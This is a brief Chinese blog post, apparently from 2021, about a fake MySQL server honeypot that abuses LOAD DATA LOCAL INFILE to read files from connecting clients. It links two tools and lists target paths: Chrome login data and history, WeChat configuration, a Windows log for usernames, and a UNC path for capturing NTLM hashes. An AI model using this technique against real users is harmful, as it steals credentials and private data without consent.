python工具软件 [2021]MySQL蜜罐,读取攻击者任意文件 mysql客户端load data语句这块没有受到限制,服务端发什么信息就会读什么,而且没有校验,特别蠢 原理 > MySQL中 load data local infile '/etc/passwd' into table test fields terminated by '\n';语句可以读取客户端本地文件并插进表中,那么我们可以伪造一个恶意的服务器,向连接服务器的客户端发送读取文件的payload。这个技术并不新鲜,但是合理利用就能起到一些不错的成果。 脚本: https://github.com/ev0A/Mysqlist https://github.com/qigpig/MysqlHoneypot ```c chrome的login data,虽然无法解密出密码,但是还是可以获取到对方的一些账号的 'C:/Users/' + username + '/AppData/Local/Google/Chrome/User Data/Default/Login Data' chrome的历史记录 'C:/Users/' + username + '/AppData/Local/Google/Chrome/User Data/Default/History' 用户的NTLM Hash(Bettercap + responder) \\ip\test C:\Users\username\Documents\WeChat Files\All Users\config\config.data中含有微信ID C:\Windows\PFRO.log中较大几率能找到用户名 ``` 阅读全文 2021-04-11 huoji 0 条评论